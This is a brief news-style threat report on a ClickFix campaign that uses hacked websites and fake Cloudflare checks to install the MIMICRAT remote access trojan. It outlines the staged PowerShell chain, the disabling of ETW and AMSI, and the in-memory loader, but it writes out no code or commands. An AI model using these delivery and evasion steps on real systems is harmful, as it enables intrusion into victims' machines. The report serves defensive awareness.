Cybercriminals Exploit Compromised Websites to Deploy MIMICRAT Malware
Cybersecurity experts have recently uncovered a sophisticated cyberattack campaign that leverages compromised legitimate websites to distribute a newly identified remote access trojan (RAT) named MIMICRAT, also referred to as AstarionRAT. This campaign exemplifies a high degree of operational complexity, utilizing a multi-stage PowerShell sequence to bypass security mechanisms before deploying the malware.
Infection Mechanism:
The attack initiates through legitimate websites that have been infiltrated by cybercriminals. These sites are injected with malicious JavaScript code, which loads an externally hosted PHP script. This script presents visitors with a counterfeit Cloudflare verification page, instructing them to copy and paste a command into the Windows Run dialog to resolve a fabricated issue.
Executing this command triggers a PowerShell script that contacts a command-and-control (C2) server to retrieve a secondary PowerShell script. This script disables Windows event logging (ETW) and antivirus scanning (AMSI) to evade detection, subsequently deploying a Lua-based loader. The loader decrypts and executes shellcode in memory, culminating in the installation of MIMICRAT.
Capabilities of MIMICRAT:
MIMICRAT is a custom C++ RAT equipped with features such as Windows token impersonation, SOCKS5 tunneling, and a suite of 22 commands facilitating extensive post-exploitation activities. The malware communicates with its C2 server over HTTPS, employing HTTP profiles that mimic legitimate web analytics traffic to avoid detection.
Global Reach and Localization:
The campaign demonstrates a broad geographical impact, with victims including a U.S.-based university and multiple Chinese-speaking users. The lure content is dynamically localized into 17 languages based on the victim’s browser settings, enhancing its effectiveness across diverse regions.
Connections to Other Campaigns:
Analyses indicate that this campaign shares tactical and infrastructural similarities with previous ClickFix campaigns, notably those involving the Matanbuchus 3.0 loader, which also deploys MIMICRAT. The ultimate objectives of these attacks are believed to be ransomware deployment or data exfiltration.
Implications and Recommendations:
This campaign underscores the evolving sophistication of cyber threats, particularly those exploiting trusted websites to disseminate malware. Organizations are advised to implement robust security measures, including regular monitoring of web assets, employee training on recognizing phishing tactics, and maintaining up-to-date security protocols to mitigate such risks.
